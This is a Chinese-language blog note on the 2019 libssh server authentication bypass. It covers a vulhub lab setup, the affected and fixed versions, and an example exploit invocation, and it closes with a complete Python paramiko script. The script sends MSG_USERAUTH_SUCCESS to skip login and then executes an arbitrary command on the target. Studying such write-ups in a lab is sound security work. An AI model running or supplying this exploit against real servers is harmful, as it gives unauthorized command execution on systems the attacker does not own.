libssh 服务端权限认证绕过漏洞

• 2019 年 10 月 7 日
• 筆記

libssh是一个提供ssh相关接口的开源库，包含服务端、客户端等。其服务端代码中存在一处逻辑错误，攻击者可以在认证成功前发送MSG_USERAUTH_SUCCESS消息，绕过认证过程，未授权访问目标SSH服务器。

在vulhub上开启环境，端口是2222，我们可以使用账号密码：myuser:mypassword），连接，这是一个合法的ssh流程。

启动环境：

docker-compose up -d

漏洞poc参考seebug上给出的poc，

链接是：https://www.seebug.org/vuldb/ssvid-97614

修改之后，可以直接执行任意命令。exp利用方式如下：

利用命令： python3 libsshexp.py 172.16.1.33 2222 "whoami"

攻击者成功利用此漏洞，可登入目标服务器进一步进行任意恶意操作。

另外值得说明的是，OpenSSH 与 libssh 是两个独立的项目，并且 OpenSSH 官方安全团队目前也尚未发布任何与此漏洞相关的信息，故 OpenSSH 应该不受此漏洞影响。

影响范围

libssh 0.8.x – 0.8.3

libssh 0.7.x – 0.7.5

libssh 0.6.x

解决方案

libssh 0.8.x 版本请升级到 0.8.4

libssh 0.7.x 版本请升级到 0.7.6

附上漏洞利用代码：

#!/usr/bin/env python3

import sys

import paramiko

import socket

import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)

bufsize = 2048

def execute(hostname, port, command):

sock = socket.socket()

try:

sock.connect((hostname, int(port)))

message = paramiko.message.Message()

transport = paramiko.transport.Transport(sock)

transport.start_client()

message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)

transport._send_message(message)

client = transport.open_session(timeout=10)

client.exec_command(command)

# stdin = client.makefile("wb", bufsize)

stdout = client.makefile("rb", bufsize)

stderr = client.makefile_stderr("rb", bufsize)

output = stdout.read()

error = stderr.read()

stdout.close()

stderr.close()

return (output+error).decode()

except paramiko.SSHException as e:

logging.exception(e)

logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")

except socket.error:

logging.debug("Unable to connect.")

return None

if __name__ == '__main__':

print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))